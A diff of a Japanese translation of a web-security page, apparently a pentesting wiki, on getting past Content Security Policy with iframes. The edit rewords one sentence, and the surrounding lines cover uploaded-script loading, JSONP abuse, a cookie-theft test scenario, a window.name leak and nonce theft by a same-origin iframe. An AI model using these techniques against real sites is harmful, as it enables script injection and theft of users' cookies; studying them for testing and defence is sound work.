 ### CSPを持つiframe 
@@ -81,7 +81,7 @@ src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert
 
 ![](<../../images/image (372).png>)
 
-したがって、**サーバーにJSファイルをアップロードし、`script-src 'none'`であってもiframeを介して読み込むことができればCSPをバイパスすることが可能です**。これは**同じサイトのJSONPエンドポイントを悪用することで実行できる可能性もあります**。
+したがって、**サーバーにJSファイルをアップロードし、`script-src 'none'`であってもiframeを介してロードできる場合、CSPをバイパスすることが可能です**。これは**同じサイトのJSONPエンドポイントを悪用することで実行できる可能性もあります**。
 
 次のシナリオでテストできます。ここでは、`script-src 'none'`であってもクッキーが盗まれます。アプリケーションを実行し、ブラウザでアクセスしてください:
 ```python
@@ -120,7 +120,7 @@ victim.location = 'about:blank';
 console.log(victim.name); // → 漏洩した値
 ```
 
-* **同一オリジン iframe を介したノンスの盗難 (2024)** – CSP ノンスは DOM から削除されず、DevTools で単に隠されます。攻撃者が *同一オリジン* iframe を注入できる場合(例えば、HTML をサイトにアップロードすることによって)、子フレームは単に `document.querySelector('[nonce]').nonce` をクエリし、ポリシーを満たす新しい `